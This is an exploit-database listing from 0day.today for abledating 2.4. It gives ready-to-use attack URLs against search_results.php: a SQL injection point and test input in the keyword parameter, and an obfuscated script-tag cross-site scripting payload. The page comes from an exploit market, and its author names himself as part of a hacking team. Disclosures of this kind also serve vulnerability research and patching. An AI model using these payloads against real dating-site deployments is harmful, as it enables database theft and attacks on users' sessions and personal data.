[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

abledating v2.4 (search_results.php) Xss / Sql Injection Vulnerability

Author
a.jasbi
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11075
Category
web applications
Date add
25-05-2008
Platform
unsorted
======================================================================
abledating v2.4 (search_results.php) Xss / Sql Injection Vulnerability
======================================================================

By : Ali Jasbi ( hackerz.ir security & hacking team)
vendor : abk-soft.com
product name : abledating 2.4

Exploits :

1- Sql injection :

bug :

http://abledating//search_results.php?p_age_from=18&p_age_to=18&key
word=[sql
injection]&status=online&save_search=on&search_name=My%20search
&photo=on&p_orientation%255B%255D=2&order=rating&sort=desc&
amp;p_relation%255B%255D=4&search

test :

http://abledating/search_results.php?p_age_from=18&p_age_to=18&keyw
ord=%00'&status=online&save_search=on&search_name=My%20search&a
mp;photo=on&p_orientation%255B%255D=2&order=rating&sort=desc&am
p;p_relation%255B%255D=4&search

2-Cross site scripting :

bug :

http://abledating/search_results.php?p_orientation%5B%5D=2&p_age_from=1
8&p_age_to=18&p_relation%5B%5D=on&keyword=>'><ScRiPt%2
0%0a%0d>alert(42119.7535489005)%3B</ScRiPt>&status=online&
save_search=on&search_name=My%20search&photo=on 



#  0day.today [2024-10-06]  #